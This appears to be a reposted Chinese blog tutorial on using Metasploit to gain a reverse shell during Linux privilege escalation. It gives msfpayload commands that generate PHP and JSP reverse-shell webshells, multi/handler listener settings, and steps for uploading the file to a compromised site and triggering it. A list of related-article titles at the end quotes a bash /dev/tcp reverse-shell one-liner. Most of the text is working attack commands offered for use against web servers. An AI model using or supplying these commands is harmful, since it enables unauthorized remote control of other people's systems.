当Linux提权不能反弹Shell时利用metasploit进行提权
当LINUX提权反弹不了时.经常遇到这种情况 请出MSF ..
1 .生成WEBSHELL文件
msf > msfpayload php/reverse_php LHOST=你的IP LPORT=端口 R > dis9.php
我的BT4是在/ROOT/ 目录 然后吧dis9.php加 才能运行
把dis9.php传进你的SHELL里 例如 www.91ri.org/dis9.php
2 . 然后MSF设置接口模板和参数
msf > use multi/handler //进入 multi/handler 接口
msf exploit(handler) > set PAYLOAD php/reverse_php //写入模块 不清楚的可以先 info php/reverse_php 看看介绍
msf exploit(handler) > set LHOST 你的IP //生成dis9.php的LHOST的IP 也就是你的IP 要一样
msf exploit(handler) > set LPORT 8080 //同上
msf exploit(handler) > exploit //执行
3.反弹SHELL
然后访问你的dis9.php
root@bt4:links www.91ri.org/dis9.php
这样就会反弹一个SHELL
我们就可以继续FUCK ALL
/
JSP
msfpayload java/jsp_shell_reverse_tcp LHOST=192.168.10.1 R > balckrootkit.jsp
msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD java/jsp_shell_reverse_tcp
set PAYLOAD java/jsp_shell_reverse_tcp
msf exploit(handler) > set LHOST 192.168.10.1
LHOST => 192.168.10.1
——————————————————-
这里没SET端口 默认的4444
转载于:https://www.cnblogs.com/mujj/articles/2184641.html
当Linux提权不能反弹Shell时利用metasploit进行提权相关推荐
- linux下几种反弹Shell方法的总结与理解
实验环境 CentOS 6.5:192.168.0.3 kali2.0:192.168.0.4 方法1: 反弹shell命令如下: bash -i >& /dev/tcp/ip/port ...
- 提权(概述、水平/垂直越权、windows/linux提权、反弹shell、Linux_Exploit_Suggester、searchsploit)
文章目录 提权 一.概述 二.水平越权&垂直越权 三.分类 - windows 1. 基于windows2003 2. 基于windows2008 3. ms SQL提权 5. nc反弹she ...
- 059 提权与反弹shell
文章目录 一:权限提升概述 二:windows提权 2.1: 启动项提权 2.2:系统漏洞提权 2.2.1:笔记 2.2.2:部分截图 2.2.3:收集到的漏洞列表: 2.2.4:windows200 ...
- 【好文转载】linux反弹shell的各种姿势
本文为转载,原作者与链接如下: 作者:@11阳光 https://www.cnblogs.com/sunny11/p/14290092.html 题记 搞完xss钓鱼一时不知道服务器还能干点什么,然后 ...
- 网络安全-木马入侵windows -msfvenom反弹shell(CMD)
网络安全-木马入侵windows -msfvenom反弹shell(CMD) 前言 一,我也是初学者记录的笔记 二,可能有错误的地方,请谨慎 三,欢迎各路大神指教 四,任何文章仅作为学习使用 五,学习 ...
- 常见的反弹shell的方法以及对反弹shell的解释
文章目录 一.什么是反弹shell,以及对反弹shell作用原理的解析: 3.反弹shell的本质 linux文件描述符 重定向 输入重定向 输出重定向 标准输出与标准错误输出重定向 文件描述符的复制 ...
- mysql 反弹shell_Linux下几种反弹Shell方法的总结与理解
*本文原创作者:LlawLiet,本文属FreeBuf原创奖励计划,未经许可禁止转载. 之前在网上看到很多师傅们总结的linux反弹shell的一些方法,为了更熟练的去运用这些技术,于是自己花精力查了 ...
- 安全技术系列之反弹Shell
原文出处:https://xz.aliyun.com/t/9488 前言 在渗透测试实战中,我们经常会遇到Linux系统环境,而让Linux主机反弹个shell是再常见不过的事情了. 反弹shell, ...
- 【转】反弹Shell,看这一篇就够了
前言 在渗透测试实战中,我们经常会遇到Linux系统环境,而让Linux主机反弹个shell是再常见不过的事情了. 反弹shell,就是攻击机监听在某个TCP/UDP端口为服务端,目标机主动发起请求到 ...
最新文章
- 使用ComplexHeatmap包绘制个性化热图
- 【有三吐槽】程序员改BUG的六重境界,你,第几重了?
- 记录第一次使用Texlive+TexStudio写论文时遇到的问题(随时更新)
- 650c公路车推荐_2020最具性价比的中高端公路整车盘点
- 11月8日PHP练习《留言板》
- mysql8参数方案_Mysql8.0及以上 only_full_group_by以及其他关于sql_mode原因报错详细解决方案...
- 【BZOJ5338】[TJOI2018]异或(主席树)
- 中国企业软件为什么如此的难
- C盘文件分析(如何减小C盘容量)
- Django深入模板引擎
- jeb配置java环境_android逆向工具Jeb第一次启动
- 图像边缘检测之Prewitt算子
- 通用办公报表打印软件
- HTML5表单技术 调查问卷设计
- C#更新word目录
- Uber天使投资人杰森卡拉卡尼斯投资…
- java 迭代_java迭代是什么意思
- 坚持终身学习的重要性:只靠已有知识,你走不了多远
- 红外光谱曲线的基线调整
- web表格CSS 属性